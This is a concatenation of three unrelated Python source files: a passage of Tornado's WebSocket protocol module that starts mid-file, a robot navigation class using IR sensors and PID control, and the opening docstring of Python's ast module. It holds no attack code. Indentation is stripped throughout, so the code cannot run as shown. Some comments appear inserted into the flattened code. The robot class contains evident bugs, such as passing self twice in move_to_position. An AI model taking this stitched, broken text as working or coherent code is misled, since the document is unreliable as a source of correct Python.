# If we get an uncaught exception during the handshake,
# we have no choice but to abruptly close the connection.
# TODO: for uncaught exceptions after the handshake,
# we can close the connection more gracefully.
self.stream.close()
def get_websocket_protocol(self):
websocket_version = self.request.headers.get("Sec-WebSocket-Version")
if websocket_version in ("7", "8", "13"):
return WebSocketProtocol13(
self, compression_options=self.get_compression_options())
def _wrap_method(method):
def _disallow_for_websocket(self, *args, **kwargs):
if self.stream is None:
method(self, *args, **kwargs)
else:
raise RuntimeError("Method not supported for Web Sockets")
return _disallow_for_websocket
for method in ["write", "redirect", "set_header", "set_cookie",
"set_status", "flush", "finish"]:
setattr(WebSocketHandler, method,
_wrap_method(getattr(WebSocketHandler, method)))
class WebSocketProtocol(object):
"""Base class for WebSocket protocol versions.
"""
def __init__(self, handler):
self.handler = handler
self.request = handler.request
self.stream = handler.stream
self.client_terminated = False
self.server_terminated = False
def _run_callback(self, callback, *args, **kwargs):
"""Runs the given callback with exception handling.
On error, aborts the websocket connection and returns False.
"""
try:
callback(*args, **kwargs)
except Exception:
app_log.error("Uncaught exception in %s",
self.request.path, exc_info=True)
self._abort()
def on_connection_close(self):
self._abort()
def _abort(self):
"""Instantly aborts the WebSocket connection by closing the socket"""
self.client_terminated = True
self.server_terminated = True
self.stream.close() # forcibly tear down the connection
self.close() # let the subclass cleanup
class _PerMessageDeflateCompressor(object):
def __init__(self, persistent, max_wbits):
if max_wbits is None:
max_wbits = zlib.MAX_WBITS
# There is no symbolic constant for the minimum wbits value.
if not (8 <= max_wbits <= zlib.MAX_WBITS):
raise ValueError("Invalid max_wbits value %r; allowed range 8-%d",
max_wbits, zlib.MAX_WBITS)
self._max_wbits = max_wbits
if persistent:
self._compressor = self._create_compressor()
else:
self._compressor = None
def _create_compressor(self):
return zlib.compressobj(tornado.web.GZipContentEncoding.GZIP_LEVEL,
zlib.DEFLATED, -self._max_wbits)
def compress(self, data):
compressor = self._compressor or self._create_compressor()
data = (compressor.compress(data) +
compressor.flush(zlib.Z_SYNC_FLUSH))
assert data.endswith(b'\x00\x00\xff\xff')
return data[:-4]
class _PerMessageDeflateDecompressor(object):
def __init__(self, persistent, max_wbits):
if max_wbits is None:
max_wbits = zlib.MAX_WBITS
if not (8 <= max_wbits <= zlib.MAX_WBITS):
raise ValueError("Invalid max_wbits value %r; allowed range 8-%d",
max_wbits, zlib.MAX_WBITS)
self._max_wbits = max_wbits
if persistent:
self._decompressor = self._create_decompressor()
else:
self._decompressor = None
def _create_decompressor(self):
return zlib.decompressobj(-self._max_wbits)
def decompress(self, data):
decompressor = self._decompressor or self._create_decompressor()
return decompressor.decompress(data + b'\x00\x00\xff\xff')
class WebSocketProtocol13(WebSocketProtocol):
"""Implementation of the WebSocket protocol from RFC 6455.
This class supports versions 7 and 8 of the protocol in addition to the
final version 13.
"""
# Bit masks for the first byte of a frame.
FIN = 0x80
RSV1 = 0x40
RSV2 = 0x20
RSV3 = 0x10
RSV_MASK = RSV1 | RSV2 | RSV3
OPCODE_MASK = 0x0f
def __init__(self, handler, mask_outgoing=False,
compression_options=None):
WebSocketProtocol.__init__(self, handler)
self.mask_outgoing = mask_outgoing
self._final_frame = False
self._frame_opcode = None
self._masked_frame = None
self._frame_mask = None
self._frame_length = None
self._fragmented_message_buffer = None
self._fragmented_message_opcode = None
self._waiting = None
self._compression_options = compression_options
self._decompressor = None
self._compressor = None
self._frame_compressed = None
# The total uncompressed size of all messages received or sent.
# Unicode messages are encoded to utf8.
# Only for testing; subject to change.
self._message_bytes_in = 0
self._message_bytes_out = 0
# The total size of all packets received or sent. Includes
# the effect of compression, frame overhead, and control frames.
self._wire_bytes_in = 0
self._wire_bytes_out = 0
def accept_connection(self):
try:
self._handle_websocket_headers()
self._accept_connection()
except ValueError:
gen_log.debug("Malformed WebSocket request received",
exc_info=True)
self._abort()
return
def _handle_websocket_headers(self):
"""Verifies all invariant- and required headers
If a header is missing or have an incorrect value ValueError will be
raised
"""
fields = ("Host", "Sec-Websocket-Key", "Sec-Websocket-Version")
if not all(map(lambda f: self.request.headers.get(f), fields)):
raise ValueError("Missing/Invalid WebSocket headers")
@staticmethod
def compute_accept_value(key):
"""Computes the value for the Sec-WebSocket-Accept header,
given the value for Sec-WebSocket-Key.
"""
sha1 = hashlib.sha1()
sha1.update(utf8(key))
sha1.update(b"258EAFA5-E914-47DA-95CA-C5AB0DC85B11") # Magic value
return native_str(base64.b64encode(sha1.digest()))
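    # Known-answer example from RFC 6455 section 1.3: the key
    # "dGhlIHNhbXBsZSBub25jZQ==" yields "s3pPLMBiTxaQ9kYGzzhZRbK+xOo=".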
def _challenge_response(self):
return WebSocketProtocol13.compute_accept_value(
self.request.headers.get("Sec-Websocket-Key"))
def _accept_connection(self):
subprotocol_header = ''
subprotocols = self.request.headers.get("Sec-WebSocket-Protocol", '')
subprotocols = [s.strip() for s in subprotocols.split(',')]
if subprotocols:
selected = self.handler.select_subprotocol(subprotocols)
if selected:
assert selected in subprotocols
subprotocol_header = ("Sec-WebSocket-Protocol: %s\r\n"
% selected)
extension_header = ''
extensions = self._parse_extensions_header(self.request.headers)
for ext in extensions:
if (ext[0] == 'permessage-deflate' and
self._compression_options is not None):
# TODO: negotiate parameters if compression_options
# specifies limits.
self._create_compressors('server', ext[1])
if ('client_max_window_bits' in ext[1] and
ext[1]['client_max_window_bits'] is None):
# Don't echo an offered client_max_window_bits
# parameter with no value.
del ext[1]['client_max_window_bits']
extension_header = ('Sec-WebSocket-Extensions: %s\r\n' %
httputil._encode_header(
'permessage-deflate', ext[1]))
break
if self.stream.closed():
self._abort()
return
self.stream.write(tornado.escape.utf8(
"HTTP/1.1 101 Switching Protocols\r\n"
"Upgrade: websocket\r\n"
"Connection: Upgrade\r\n"
"Sec-WebSocket-Accept: %s\r\n"
"%s%s"
"\r\n" % (self._challenge_response(),
subprotocol_header, extension_header)))
self._run_callback(self.handler.open, *self.handler.open_args,
**self.handler.open_kwargs)
self._receive_frame()
def _parse_extensions_header(self, headers):
extensions = headers.get("Sec-WebSocket-Extensions", '')
if extensions:
return [httputil._parse_header(e.strip())
for e in extensions.split(',')]
return []
def _process_server_headers(self, key, headers):
"""Process the headers sent by the server to this client connection.
'key' is the websocket handshake challenge/response key.
"""
assert headers['Upgrade'].lower() == 'websocket'
assert headers['Connection'].lower() == 'upgrade'
accept = self.compute_accept_value(key)
assert headers['Sec-Websocket-Accept'] == accept
extensions = self._parse_extensions_header(headers)
for ext in extensions:
if (ext[0] == 'permessage-deflate' and
self._compression_options is not None):
self._create_compressors('client', ext[1])
else:
raise ValueError("unsupported extension %r", ext)
def _get_compressor_options(self, side, agreed_parameters):
"""Converts a websocket agreed_parameters set to keyword arguments
for our compressor objects.
"""
options = dict(
persistent=(side + '_no_context_takeover') not in agreed_parameters)
wbits_header = agreed_parameters.get(side + '_max_window_bits', None)
if wbits_header is None:
options['max_wbits'] = zlib.MAX_WBITS
else:
options['max_wbits'] = int(wbits_header)
return options
def _create_compressors(self, side, agreed_parameters):
# TODO: handle invalid parameters gracefully
allowed_keys = set(['server_no_context_takeover',
'client_no_context_takeover',
'server_max_window_bits',
'client_max_window_bits'])
for key in agreed_parameters:
if key not in allowed_keys:
raise ValueError("unsupported compression parameter %r" % key)
other_side = 'client' if (side == 'server') else 'server'
self._compressor = _PerMessageDeflateCompressor(
**self._get_compressor_options(side, agreed_parameters))
self._decompressor = _PerMessageDeflateDecompressor(
**self._get_compressor_options(other_side, agreed_parameters))
def _write_frame(self, fin, opcode, data, flags=0):
if fin:
finbit = self.FIN
else:
finbit = 0
frame = struct.pack("B", finbit | opcode | flags)
l = len(data)
if self.mask_outgoing:
mask_bit = 0x80
else:
mask_bit = 0
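        # RFC 6455 payload length encoding: 7 bits when < 126, a 16-bit
        # extended length for <= 0xFFFF, otherwise a 64-bit extended length.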
if l < 126:
frame += struct.pack("B", l | mask_bit)
elif l <= 0xFFFF:
frame += struct.pack("!BH", 126 | mask_bit, l)
else:
frame += struct.pack("!BQ", 127 | mask_bit, l)
if self.mask_outgoing:
mask = os.urandom(4)
data = mask + _websocket_mask(mask, data)
frame += data
self._wire_bytes_out += len(frame)
try:
return self.stream.write(frame)
except StreamClosedError:
self._abort()
def write_message(self, message, binary=False):
"""Sends the given message to the client of this Web Socket."""
if binary:
opcode = 0x2
else:
opcode = 0x1
message = tornado.escape.utf8(message)
assert isinstance(message, bytes)
self._message_bytes_out += len(message)
flags = 0
if self._compressor:
message = self._compressor.compress(message)
flags |= self.RSV1
return self._write_frame(True, opcode, message, flags=flags)
def write_ping(self, data):
"""Send ping frame."""
assert isinstance(data, bytes)
self._write_frame(True, 0x9, data)
def _receive_frame(self):
try:
self.stream.read_bytes(2, self._on_frame_start)
except StreamClosedError:
self._abort()
def _on_frame_start(self, data):
self._wire_bytes_in += len(data)
header, payloadlen = struct.unpack("BB", data)
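        # First byte: FIN, RSV1-3 and opcode; second byte: MASK bit plus the
        # 7-bit payload length.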
self._final_frame = header & self.FIN
reserved_bits = header & self.RSV_MASK
self._frame_opcode = header & self.OPCODE_MASK
self._frame_opcode_is_control = self._frame_opcode & 0x8
if self._decompressor is not None and self._frame_opcode != 0:
self._frame_compressed = bool(reserved_bits & self.RSV1)
reserved_bits &= ~self.RSV1
if reserved_bits:
# client is using as-yet-undefined extensions; abort
self._abort()
return
self._masked_frame = bool(payloadlen & 0x80)
payloadlen = payloadlen & 0x7f
if self._frame_opcode_is_control and payloadlen >= 126:
# control frames must have payload < 126
self._abort()
return
try:
if payloadlen < 126:
self._frame_length = payloadlen
if self._masked_frame:
self.stream.read_bytes(4, self._on_masking_key)
else:
self.stream.read_bytes(self._frame_length,
self._on_frame_data)
elif payloadlen == 126:
self.stream.read_bytes(2, self._on_frame_length_16)
elif payloadlen == 127:
self.stream.read_bytes(8, self._on_frame_length_64)
except StreamClosedError:
self._abort()
def _on_frame_length_16(self, data):
self._wire_bytes_in += len(data)
self._frame_length = struct.unpack("!H", data)[0]
try:
if self._masked_frame:
self.stream.read_bytes(4, self._on_masking_key)
else:
self.stream.read_bytes(self._frame_length, self._on_frame_data)
except StreamClosedError:
self._abort()
def _on_frame_length_64(self, data):
self._wire_bytes_in += len(data)
self._frame_length = struct.unpack("!Q", data)[0]
try:
if self._masked_frame:
self.stream.read_bytes(4, self._on_masking_key)
else:
self.stream.read_bytes(self._frame_length, self._on_frame_data)
except StreamClosedError:
self._abort()
def _on_masking_key(self, data):
self._wire_bytes_in += len(data)
self._frame_mask = data
try:
self.stream.read_bytes(self._frame_length,
self._on_masked_frame_data)
except StreamClosedError:
self._abort()
def _on_masked_frame_data(self, data):
# Don't touch _wire_bytes_in; we'll do it in _on_frame_data.
self._on_frame_data(_websocket_mask(self._frame_mask, data))
def _on_frame_data(self, data):
self._wire_bytes_in += len(data)
if self._frame_opcode_is_control:
# control frames may be interleaved with a series of fragmented
# data frames, so control frames must not interact with
# self._fragmented_*
if not self._final_frame:
# control frames must not be fragmented
self._abort()
return
opcode = self._frame_opcode
elif self._frame_opcode == 0: # continuation frame
if self._fragmented_message_buffer is None:
# nothing to continue
self._abort()
return
self._fragmented_message_buffer += data
if self._final_frame:
opcode = self._fragmented_message_opcode
data = self._fragmented_message_buffer
self._fragmented_message_buffer = None
else: # start of new data message
if self._fragmented_message_buffer is not None:
# can't start new message until the old one is finished
self._abort()
return
if self._final_frame:
opcode = self._frame_opcode
else:
self._fragmented_message_opcode = self._frame_opcode
self._fragmented_message_buffer = data
if self._final_frame:
self._handle_message(opcode, data)
if not self.client_terminated:
self._receive_frame()
def _handle_message(self, opcode, data):
if self.client_terminated:
return
if self._frame_compressed:
data = self._decompressor.decompress(data)
if opcode == 0x1:
# UTF-8 data
self._message_bytes_in += len(data)
try:
decoded = data.decode("utf-8")
except UnicodeDecodeError:
self._abort()
return
self._run_callback(self.handler.on_message, decoded)
elif opcode == 0x2:
# Binary data
self._message_bytes_in += len(data)
self._run_callback(self.handler.on_message, data)
elif opcode == 0x8:
# Close
self.client_terminated = True
if len(data) >= 2:
self.handler.close_code = struct.unpack('>H', data[:2])[0]
if len(data) > 2:
self.handler.close_reason = to_unicode(data[2:])
# Echo the received close code, if any (RFC 6455 section 5.5.1).
self.close(self.handler.close_code)
elif opcode == 0x9:
# Ping
self._write_frame(True, 0xA, data)
elif opcode == 0xA:
# Pong
self._run_callback(self.handler.on_pong, data)
else:
self._abort()
def close(self, code=None, reason=None):
"""Closes the WebSocket connection."""
if not self.server_terminated:
if not self.stream.closed():
if code is None and reason is not None:
code = 1000 # "normal closure" status code
if code is None:
close_data = b''
else:
close_data = struct.pack('>H', code)
if reason is not None:
close_data += utf8(reason)
self._write_frame(True, 0x8, close_data)
self.server_terminated = True
if self.client_terminated:
if self._waiting is not None:
self.stream.io_loop.remove_timeout(self._waiting)
self._waiting = None
self.stream.close()
elif self._waiting is None:
# Give the client a few seconds to complete a clean shutdown,
# otherwise just close the connection.
self._waiting = self.stream.io_loop.add_timeout(
self.stream.io_loop.time() + 5, self._abort)
class WebSocketClientConnection(simple_httpclient._HTTPConnection):
"""WebSocket client connection.
This class should not be instantiated directly; use the
`websocket_connect` function instead.
"""
def __init__(self, io_loop, request, on_message_callback=None,
compression_options=None):
self.compression_options = compression_options
self.connect_future = TracebackFuture()
self.protocol = None
self.read_future = None
self.read_queue = collections.deque()
self.key = base64.b64encode(os.urandom(16))
self._on_message_callback = on_message_callback
self.close_code = self.close_reason = None
scheme, sep, rest = request.url.partition(':')
scheme = {'ws': 'http', 'wss': 'https'}[scheme]
request.url = scheme + sep + rest
request.headers.update({
'Upgrade': 'websocket',
'Connection': 'Upgrade',
'Sec-WebSocket-Key': self.key,
'Sec-WebSocket-Version': '13',
})
if self.compression_options is not None:
# Always offer to let the server set our max_wbits (and even though
# we don't offer it, we will accept a client_no_context_takeover
# from the server).
# TODO: set server parameters for deflate extension
# if requested in self.compression_options.
request.headers['Sec-WebSocket-Extensions'] = (
'permessage-deflate; client_max_window_bits')
self.tcp_client = TCPClient(io_loop=io_loop)
super(WebSocketClientConnection, self).__init__(
io_loop, None, request, lambda: None, self._on_http_response,
104857600, self.tcp_client, 65536, 104857600)
def close(self, code=None, reason=None):
"""Closes the websocket connection.
``code`` and ``reason`` are documented under
`WebSocketHandler.close`.
.. versionadded:: 3.2
.. versionchanged:: 4.0
Added the ``code`` and ``reason`` arguments.
"""
if self.protocol is not None:
self.protocol.close(code, reason)
self.protocol = None
def on_connection_close(self):
if not self.connect_future.done():
self.connect_future.set_exception(StreamClosedError())
self.on_message(None)
self.tcp_client.close()
super(WebSocketClientConnection, self).on_connection_close()
def _on_http_response(self, response):
if not self.connect_future.done():
if response.error:
self.connect_future.set_exception(response.error)
else:
self.connect_future.set_exception(WebSocketError(
"Non-websocket response"))
def headers_received(self, start_line, headers):
if start_line.code != 101:
return super(WebSocketClientConnection, self).headers_received(
start_line, headers)
self.headers = headers
self.protocol = self.get_websocket_protocol()
self.protocol._process_server_headers(self.key, self.headers)
self.protocol._receive_frame()
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
self._timeout = None
self.stream = self.connection.detach()
self.stream.set_close_callback(self.on_connection_close)
# Once we've taken over the connection, clear the final callback
# we set on the http request. This deactivates the error handling
# in simple_httpclient that would otherwise interfere with our
# ability to see exceptions.
self.final_callback = None
self.connect_future.set_result(self)
def write_message(self, message, binary=False):
"""Sends a message to the WebSocket server."""
return self.protocol.write_message(message, binary)
def read_message(self, callback=None):
"""Reads a message from the WebSocket server.
If on_message_callback was specified at WebSocket
        initialization, this function will never return messages.
Returns a future whose result is the message, or None
if the connection is closed. If a callback argument
is given it will be called with the future when it is
ready.
"""
assert self.read_future is None
future = TracebackFuture()
if self.read_queue:
future.set_result(self.read_queue.popleft())
else:
self.read_future = future
if callback is not None:
self.io_loop.add_future(future, callback)
return future
def on_message(self, message):
if self._on_message_callback:
self._on_message_callback(message)
elif self.read_future is not None:
self.read_future.set_result(message)
self.read_future = None
else:
self.read_queue.append(message)
def on_pong(self, data):
pass
def get_websocket_protocol(self):
return WebSocketProtocol13(self, mask_outgoing=True,
compression_options=self.compression_options)
def websocket_connect(url, io_loop=None, callback=None, connect_timeout=None,
on_message_callback=None, compression_options=None):
"""Client-side websocket support.
Takes a url and returns a Future whose result is a
`WebSocketClientConnection`.
``compression_options`` is interpreted in the same way as the
return value of `.WebSocketHandler.get_compression_options`.
The connection supports two styles of operation. In the coroutine
style, the application typically calls
`~.WebSocketClientConnection.read_message` in a loop::
conn = yield websocket_connect(url)
while True:
msg = yield conn.read_message()
if msg is None: break
# Do something with msg
In the callback style, pass an ``on_message_callback`` to
``websocket_connect``. In both styles, a message of ``None``
indicates that the connection has been closed.
.. versionchanged:: 3.2
Also accepts ``HTTPRequest`` objects in place of urls.
.. versionchanged:: 4.1
Added ``compression_options`` and ``on_message_callback``.
The ``io_loop`` argument is deprecated.
"""
if io_loop is None:
io_loop = IOLoop.current()
if isinstance(url, httpclient.HTTPRequest):
assert connect_timeout is None
request = url
# Copy and convert the headers dict/object (see comments in
# AsyncHTTPClient.fetch)
request.headers = httputil.HTTPHeaders(request.headers)
else:
request = httpclient.HTTPRequest(url, connect_timeout=connect_timeout)
request = httpclient._RequestProxy(
request, httpclient.HTTPRequest._DEFAULTS)
conn = WebSocketClientConnection(io_loop, request,
on_message_callback=on_message_callback,
compression_options=compression_options)
if callback is not None:
io_loop.add_future(conn.connect_future, callback)
return conn.connect_future
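# --- Hedged wiring sketch (not part of the module above) ---
# Shows how a handler such as the EchoWebSocket from the WebSocketHandler
# docstring is typically mapped to a URL; kept as comments so the module's
# import-time behaviour is unchanged.
#
#     import tornado.ioloop
#     app = tornado.web.Application([(r"/websocket", EchoWebSocket)])
#     app.listen(8888)
#     tornado.ioloop.IOLoop.current().start()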
|
|
from bot.hardware.IR import IR
from side import Side
from bot.driver.omni_driver import OmniDriver
import bot.lib.lib as lib
from time import sleep
from time import time
from pid import PID
import os.path
import yaml
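# Clamp x into the closed interval [l, u].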
bound = lambda x, l, u: l if x < l else u if x > u else x
MAX_VALUE = 800
class Navigation(object):
def __init__(self, rail_cars=0):
self.config = lib.get_config()
self.PID_values = self.config["IR_PID"]
self.device = IR() # INSTANTIATE ONLY ONCE
self.north = Side("North Left", "North Right", self.device.read_values, self.PID_values["North"]["diff"], self.PID_values["North"]["dist"])
self.south = Side("South Left", "South Right", self.device.read_values, self.PID_values["South"]["diff"], self.PID_values["South"]["dist"])
self.east = Side("East Top", "East Bottom", self.device.read_values, self.PID_values["East"]["diff"], self.PID_values["East"]["dist"])
self.west = Side("West Top", "West Bottom", self.device.read_values, self.PID_values["West"]["diff"], self.PID_values["West"]["dist"])
self.driver = OmniDriver()
self.sides = {"north": self.north,
"south": self.south,
"west": self.west,
"east": self.east}
self.moving = False
self.logger = lib.get_logger()
mapping = ["EXIT", "west", "east", "EXIT"]
self.rail_cars_side = mapping[rail_cars]
def stop_unused_motors(self, direction):
direction = direction.lower()
if direction == "north" or direction == "south":
self.driver.set_motor("north", 0)
self.driver.set_motor("south", 0)
elif direction == "east" or direction == "west":
self.driver.set_motor("east", 0)
self.driver.set_motor("west", 0)
@lib.api_call
def move_correct(self, direction, side, target, speed, timestep, threshold=1000000):
# speed >= 0
side = side.lower()
        diff_err = self.sides[side].get_diff_correction(timestep, threshold)
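        # sne/spe: base speed nudged down/up by the differential PID error so the
        # side's two IR sensors stay equidistant from the wall (heading stays parallel).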
# setting speed bounds
sne = bound(speed-diff_err, -100, 100)
# sne = -100 if sne < -100 else 100 if sne > 100 else sne
spe = bound(speed+diff_err, -100, 100)
#spe = -100 if spe < -100 else 100 if spe > 100 else spe
#self.logger.info("Error from PID : %d", diff_err)
dist_err = self.sides[side].get_dist_correction(target, timestep)
#self.logger.info("dist Error from PID : %d", dist_err)
dist_err = bound(dist_err, -100, 100)
if side == "north":
self.driver.set_motor("east", -dist_err)
self.driver.set_motor("west", -dist_err)
if direction == "west":
self.driver.set_motor("north", -spe)
self.driver.set_motor("south", -sne)
if direction == "east":
self.driver.set_motor("north", sne)
self.driver.set_motor("south", spe)
elif side == "south":
self.driver.set_motor("east", dist_err)
self.driver.set_motor("west", dist_err)
if direction == "west":
self.driver.set_motor("north", sne)
self.driver.set_motor("south", spe)
if direction == "east":
self.driver.set_motor("north", sne)
self.driver.set_motor("south", -spe)
elif side == "east":
self.driver.set_motor("north", -dist_err)
self.driver.set_motor("south", -dist_err)
if direction == "north":
self.driver.set_motor("west", sne)
self.driver.set_motor("east", spe)
elif direction == "south":
self.driver.set_motor("west", -spe)
self.driver.set_motor("east", -sne)
elif side == "west":
self.driver.set_motor("north", dist_err)
self.driver.set_motor("south", dist_err)
if direction == "north":
self.driver.set_motor("west", spe)
self.driver.set_motor("east", sne)
elif direction == "south":
self.driver.set_motor("west", -sne)
self.driver.set_motor("east", -spe)
else:
raise Exception()
def move_dead(self, direction, speed):
direction = direction.lower()
dirs = {"north": 0, "west": 90, "south": 180, "east": 270}
self.driver.move(speed, dirs[direction])
def drive_dead(self, direction, speed, duration):
self.move_dead(direction, speed)
sleep(duration)
self.stop()
@lib.api_call
def drive_along_wall(self, direction, side, duration):
time_elapsed = time()
final_time = time_elapsed + duration
while time_elapsed < final_time:
timestep = time()-time_elapsed
time_elapsed = time()
if direction == "west" or direction == "east":
self.move_correct(direction, side, 300, 65, timestep)
else:
self.move_correct(direction, side, 300, 50, timestep)
sleep(0.01)
self.stop()
@lib.api_call
def test(self):
#self.drive_along_wall("west", "north", 5)
self.move_until_wall("north", "east", 400)
@lib.api_call
def move_until_wall(self, direction, side, target, dist=150):
direction = direction.lower()
mov_side = self.sides[direction]
mov_target = dist
self.moving = True
time_elapsed = time()
while self.moving:
timestep = time() - time_elapsed
time_elapsed = time()
self.move_correct(direction, side, mov_target, 60, timestep)
if mov_side.get_distance() <= target:
self.stop()
#TODO: Update the controller in this function
@lib.api_call
def move_smooth_until_wall(self, direction, side, target, dist=150, t_type="avg"):
direction = direction.lower()
mov_side = self.sides[direction]
mov_target = dist
self.moving = True
time_elapsed = time()
speed = 0
speed_pid = PID()
speed_pid.set_k_values(4, 0.01, 0)
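        # The PID converts the remaining distance to the target into a speed
        # command, so the robot decelerates as it approaches the wall.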
while self.moving:
timestep = time() - time_elapsed
time_elapsed = time()
speed = speed_pid.pid(0, target - mov_side.get_distance(), timestep)
if direction == "east" or direction == "west":
speed = bound(speed, -65, 65)
else:
speed = bound(speed, -65, 65)
self.move_correct(direction, side, mov_target, speed, timestep)
if mov_side.get_distance(t_type) <= target:
self.stop()
def move_to_position(self, x, y):
self.move_until_wall(self, "west", "north", x)
sleep(0.5)
self.move_until_wall(self, "north", "west", y)
sleep(0.5)
@lib.api_call
def stop(self):
self.driver.move(0)
self.moving = False
@lib.api_call
def set_PID_values(self, side_to_set, pid, kp, kd, ki):
set_side = self.sides[side_to_set]
if (pid == "diff"):
set_side.diff_pid.set_k_values(kp, kd, ki)
elif(pid == "dist"):
set_side.dist_pid.set_k_values(kp, kd, ki)
# write updated PID values to the IR_config file
# with open("IR_config.yaml") as f:
# a = yaml.load(f)
# a["IR_PID"][side_to_set][pid] = [kp, kd, ki]
# with open("IR_config.yaml", "w") as f:
# yaml.dump(a, f)
@lib.api_call
def read_IR_values(self):
self.logger.info("Test")
return self.device.read_values()
@lib.api_call
def move_until_color(self, direction, side, color):
direction = direction.lower()
mov_side = self.sides[direction]
        self.logger.info("Moving %s until a %s line is detected", direction, color)
self.moving = True
time_elapsed = time()
while self.moving:
timestep = time() - time_elapsed
time_elapsed = time()
self.move_correct(direction, side, 180, 55, timestep)
ir_values = mov_side.get_values()
# IR sensor for line detection is attached to South Left
ir_value = ir_values["South Left"]
if color == "white":
if ir_value >= 1000:
self.stop()
else:
if ir_value <= 1000:
self.stop()
@lib.api_call
def rotate_start(self):
ir_values = self.device.read_values()
# If North side is facing inner wall of tunnel rotate until East top can see inner wall.
while ir_values["East Bottom"] > 200 and ir_values["East Top"] > 200:
# counter clockwise
self.driver.rotate_t(60, .1)
sleep(.1)
ir_values = self.device.read_values()
self.logger.info("Now straightening out")
# Straighten out inside the tunnel
ir_values = self.device.read_values()
ir_diff = abs(ir_values["East Bottom"] - ir_values["East Top"])
while (ir_diff > 20):
if ir_values["East Bottom"] < ir_values["East Top"]:
# clockwise
self.driver.rotate_t(-60, .1)
sleep(0.1)
elif ir_values["East Bottom"] > ir_values["East Top"]:
# counter clockwise
self.driver.rotate_t(60, .1)
sleep(0.1)
else:
break
ir_values = self.device.read_values()
ir_diff = abs(ir_values["East Bottom"] - ir_values["East Top"])
@lib.api_call
def goto_top(self):
if self.east.get_distance() < MAX_VALUE:
self.move_smooth_until_wall("north", "east", 300)
elif self.west.get_distance() < MAX_VALUE:
self.move_smooth_until_wall("north", "west", 300)
@lib.api_call
def goto_railcar(self):
self.goto_top()
self.logger.info("Currently near barge")
if self.rail_cars_side == "west":
self.logger.info("Going west towards railcars")
self.move_smooth_until_wall("west", "north", 150, t_type="min")
elif self.rail_cars_side == "east":
self.logger.info("Going east towards railcars")
self.move_smooth_until_wall("east", "north", 150, t_type="min")
# TODO: Make a gotoBoat function
# go north towards block, then towards rail cars and straight down
def goto_boat(self):
self.goto_railcar()
if self.rail_cars_side == "west":
self.move_until_wall("south", "west", 200)
elif self.rail_cars_side == "east":
self.move_until_wall("south", "east", 200)
def goto_truck(self):
self.goto_top()
if self.rail_cars_side == "west":
self.move_until_wall("east", "north", 150)
if self.rail_cars_side == "east":
self.move_until_wall("west", "north", 150)
self.move_until_wall("south", "south", 150)
def goto_block_zone_A(self):
self.goto_railcar()
@lib.api_call
def goto_block_zone_B(self):
self.goto_top()
self.logger.info("sensor value: %d",self.east.get_distance())
self.logger.info("sensor value: %d", self.west.get_distance())
if self.east.get_distance() < MAX_VALUE:
self.logger.info("I'm on right side of course. Going to white line on my left")
self.move_until_color("west", "north", "white")
elif self.west.get_distance() < MAX_VALUE:
self.logger.info("I'm on left side of course. Going to white line on my right")
self.move_until_color("east", "north", "white")
self.logger.info("Reached Zone B")
@lib.api_call
def bang(self, side="north"):
self.drive_dead(side, 50, 0.5)
@lib.api_call
def get_off_wall(self):
self.drive_dead("south", 50, 0.333)
@lib.api_call
def correct_bang(self):
self.get_off_wall()
self.drive_dead("north", 50, 0.7)
self.logger.info("Aligned with barge")
@lib.api_call
def bang_railcar(self):
self.drive_dead(self.rail_cars_side, 60, 0.5)
@lib.api_call
def get_off_railcar(self):
if self.rail_cars_side == "east":
self.drive_dead("west", 60, 0.5)
else:
self.drive_dead("east", 60, 0.5)
@lib.api_call
def correct_bang_railcar(self):
self.get_off_railcar()
self.drive_dead(self.rail_cars_side, 60, 0.7)
self.logger.info("Aligned with railcars")
def goto_block_zone_C(self):
self.goto_top()
if self.rail_cars_side == "west":
self.move_until_wall("east", "north", 100)
if self.rail_cars_side == "east":
self.move_until_wall("west", "north", 100)
@lib.api_call
def set_bias(self, side, bias):
side = side.replace("_", " ")
self.device.set_bias(side,bias)
@lib.api_call
def get_sensor_value(self, value):
if "_" in value:
value = value.replace("_", " ")
try:
return self.read_IR_values()[value]
except KeyError:
self.logger.warning("Invalid Key for IR Values %s"%value)
#TODO: to be tested
@lib.api_call
def goto_next_railcar(self):
def avg(vals):
return sum(vals)/float(len(vals))
self.moving = True
speed = 50
sensor = "West Bottom"
last_value = self.get_sensor_value(sensor)
self.logger.info("sensor value: %d", last_value)
last_set = [last_value for i in xrange(10)]
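        # Keep a 10-sample sliding window of IR readings; a jump of the current
        # reading well above the window average marks the edge of a railcar.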
time_elapsed = time()
self.move_dead("south", speed)
while self.moving:
timestep = time() - time_elapsed
time_elapsed = time()
curr_value = self.get_sensor_value(sensor)
self.logger.info("sensor Type: %s, sensor value: %d, avg: %d", sensor, curr_value, avg(last_set))
diff = curr_value - avg(last_set)
self.move_correct("south", self.rail_cars_side, 150, speed, timestep, threshold=100)
if diff > 50:
break
if sensor == "West Bottom":
sensor = "West Top"
speed = 35
last_set = [curr_value for i in xrange(10)]
else:
self.moving = False
break
last_set.pop(0)
last_set.append(curr_value)
sleep(0.01)
self.stop()
@lib.api_call
def drive_through_tunnel(self):
        self.move_through_tunnel(-75, -75, 75, 90, 0.85)
        sleep(0.8)
self.logger.info("Climbed the tunnel")
self.rotate_start()
self.logger.info("Auto-corrected inside tunnel")
sleep(0.8)
if self.rail_cars_side == "west":
self.move_smooth_until_wall("north", "east", 500)
else:
self.move_smooth_until_wall("north", "west", 500)
self.logger.info("Reached the barge")
sleep(0.8)
@lib.api_call
def move_s(self, north=-100, south=-100, west=80, east=80):
self.driver.set_motor("east", east)
self.driver.set_motor("north", north)
self.driver.set_motor("south", south)
self.driver.set_motor("west", west)
@lib.api_call
def move_through_tunnel(self, north=-100, south=-100, west=80, east=80, duration=.75):
        self.move_s(north, south, west, east)
sleep(duration)
self.stop()
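    # Illustrative call order (added note, not part of the original class): a
    # run typically chains these api_calls, e.g. drive_through_tunnel() to reach
    # the barge, correct_bang() to square up against it, then goto_railcar() and
    # correct_bang_railcar() before stepping along cars with goto_next_railcar().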
|
|
"""
ast
~~~
The `ast` module helps Python applications to process trees of the Python
abstract syntax grammar. The abstract syntax itself might change with
each Python release; this module helps to find out programmatically what
the current grammar looks like and allows modifications of it.
An abstract syntax tree can be generated by passing `ast.PyCF_ONLY_AST` as
a flag to the `compile()` builtin function or by using the `parse()`
function from this module. The result will be a tree of objects whose
classes all inherit from `ast.AST`.
A modified abstract syntax tree can be compiled into a Python code object
using the built-in `compile()` function.
Additionally various helper functions are provided that make working with
the trees simpler. The main intention of the helper functions and this
module in general is to provide an easy to use interface for libraries
that work tightly with the python syntax (template engines for example).
:copyright: Copyright 2008 by Armin Ronacher.
:license: Python License.
"""
from _ast import *
from _ast import __version__
